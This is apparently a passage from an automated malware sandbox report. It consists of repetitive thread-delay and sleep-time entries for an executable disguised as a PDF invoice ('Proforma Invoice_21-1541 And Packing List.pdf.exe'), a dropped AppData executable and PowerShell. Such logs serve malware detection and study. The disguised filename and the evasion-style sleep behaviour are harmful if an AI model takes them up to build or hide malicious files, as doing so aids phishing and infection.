                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 598311Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 598203Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 598092Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 597967Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 597858Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 597750Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 597640Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 597531Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 597422Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 597311Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 597202Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 597093Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 596984Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 596875Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 596765Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 596655Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 596546Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 596437Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 596328Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 596218Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 596109Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 596000Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 595890Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 595781Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 595671Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 595562Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 595453Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 595343Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 595234Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 595124Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 595014Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 594906Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 594776Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 594650Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 594547Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 599875
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 599766
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 599641
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 599531
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 599422
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 599313
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 599188
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 599063
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 598938
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 598828
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 598715
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 598610
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 598448
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 598320
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 598219
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 598094
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 597983
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 597875
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 597766
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 597656
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 597543
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 597438
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 597313
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 597188
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 597078
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 596969
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 596844
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 596734
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 596625
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 596516
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 596406
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 596297
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 596188
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 596063
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 595953
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 595844
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 595719
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 595609
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 595500
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 595366
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 595250
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 595141
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 595030
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 594894
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 594780
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 594658
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 594532
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 594407
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeThread delayed: delay time: 594282
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3835Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5914Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeWindow / User API: threadDelayed 4434Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeWindow / User API: threadDelayed 5411Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeWindow / User API: threadDelayed 7295
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeWindow / User API: threadDelayed 2533
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 7596Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 6712Thread sleep count: 4434 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -599890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 6712Thread sleep count: 5411 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -599780s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -599656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -599547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -599422s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -599312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -599203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -599093s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -598984s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -598875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -598765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -598656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -598547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -598422s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -598311s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -598203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -598092s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -597967s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -597858s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -597750s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -597640s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -597531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -597422s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -597311s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -597202s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -597093s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -596984s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -596875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -596765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -596655s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -596546s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -596437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -596328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -596218s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -596109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -596000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -595890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -595781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -595671s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -595562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -595453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -595343s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -595234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -595124s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -595014s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -594906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -594776s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -594650s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe TID: 8172Thread sleep time: -594547s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 8188Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep count: 33 > 30
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -30437127721620741s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -599875s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 5720Thread sleep count: 7295 > 30
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 5720Thread sleep count: 2533 > 30
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -599766s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -599641s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -599531s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -599422s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -599313s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -599188s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -599063s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -598938s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -598828s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -598715s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -598610s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -598448s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -598320s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -598219s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -598094s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -597983s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -597875s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -597766s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -597656s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -597543s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -597438s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -597313s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -597188s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -597078s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -596969s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -596844s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -596734s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -596625s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -596516s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -596406s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -596297s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -596188s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -596063s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -595953s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -595844s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -595719s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -595609s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -595500s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -595366s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -595250s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -595141s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -595030s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -594894s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -594780s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -594658s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -594532s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -594407s >= -30000s
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe TID: 2652Thread sleep time: -594282s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 599780Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 599312Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 599203Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 599093Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 598875Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 598765Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 598422Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 598311Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 598203Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 598092Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 597967Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 597858Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 597750Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 597640Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 597531Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 597422Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 597311Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 597202Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 597093Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 596984Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 596875Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 596765Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 596655Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 596546Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 596437Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 596328Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 596218Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 596109Jump to behavior
